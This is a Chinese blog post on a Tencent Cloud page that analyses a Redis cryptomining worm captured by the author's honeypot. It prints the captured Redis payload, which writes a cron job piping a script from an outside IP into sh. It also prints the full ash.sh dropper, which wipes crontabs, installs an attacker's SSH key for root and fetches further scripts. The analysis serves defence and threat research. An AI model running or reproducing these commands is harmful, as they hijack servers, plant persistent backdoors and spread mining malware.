前往小程序,Get更优阅读体验!
立即前往
文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
腾讯云架构师技术同盟
文章/答案/技术大牛
发布
首页
学习
活动
专区
工具
TVP腾讯云架构师技术同盟
返回腾讯云官网
社区首页 >专栏 >Redis删库跑路加勒索?也有挖矿的呢

Redis删库跑路加勒索?也有挖矿的呢

作者头像
用户1423082
发布2024-12-31 18:34:55
发布2024-12-31 18:34:55
6200
代码可运行
举报
文章被收录于专栏:giantbranch's bloggiantbranch's blog
运行总次数:0
代码可运行

在9月10日我就发现我的蜜罐有个url的数量出现暴增(估计还可能因为我写递归提取下载地址的时候没有控制好),但是没空去分析,简单看了下是redis的6379端口的。(当然现在这个脚本已经下线了)

9月11日0点,阿里发了一个预警《预警| 删库跑路加勒索,Redis勒索事件爆发》,详细请看下面链接

https://media.weibo.cn/article?id=2309404282854916934109

我看了下我的蜜罐有没有http://103.224.80.52/butterfly.sh这个url,发现并没有,估计是因为我没有模拟redis服务,只是开放了6379端口

我这边抓到的payload是下面的,也是通过写入cron的方式

代码语言:javascript
代码运行次数:0
复制
*3\r\n$3\r\nset\r\n$7\r\nbackup1\r\n$64\r\n\n\n\n*/2 * * * * curl -fsSL http://47.93.38.159:8080/ash.sh | sh\n\n\r\n

看看ash.sh脚本,主要是写入ssh公钥和写入cron和下载bsh.sh执行

代码语言:javascript
代码运行次数:0
复制
uname -a
id
hostname
setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
crontab -r 2>/dev/null
rm -rf /var/spool/cron/* 2>/dev/null
mkdir -p /var/spool/cron/crontabs 2>/dev/null
mkdir -p /root/.ssh 2>/dev/null
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redisX' > /root/.ssh/authorized_keys
echo '*/15 * * * * curl -fsSL http://47.93.38.159:8080/ash.sh|sh' > /var/spool/cron/root
echo '*/20 * * * * curl -fsSL http://47.93.38.159:8080/ash.sh|sh' > /var/spool/cron/crontabs/root
yum install -y bash 2>/dev/null
apt install -y bash 2>/dev/null
apt-get install -y bash 2>/dev/null
bash -c 'curl -fsSL http://47.93.38.159:8080/bsh.sh|bash' 2>/dev/null
service crond restart

bsh.sh就是常规的挖矿套路了

下载挖矿程序,并添加到开机自启动

最后安装iptables等软件,masscan扫描工具,下载rsh.sh并执行

最后看看rsh.sh,首先只允许本地连接6379端口,尝试ssh到之前连接过的主机执行下载ash.sh进行蠕虫式传播

还有利用之前的masscan进行内网扫描开放的6379端口进行蠕虫式传播

脚本sha256

fdc717003b665286792be8b95337b47b1066e1b44df90046baa9a8dbae7eab7c bb33db427153eba06086013a677ec3fff195d3e75577e93938a3174e37e4fd9d ab95a9e7a65ef7eea32e59834c12ce7e22f4d06422c916fdd6239648836eece5

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2018-09-12,如有侵权请联系 cloudcommunity@tencent.com 删除
null
redis
sh
脚本
软件

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

null
redis
sh
脚本
软件
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
目录
  • 脚本sha256
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2025 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论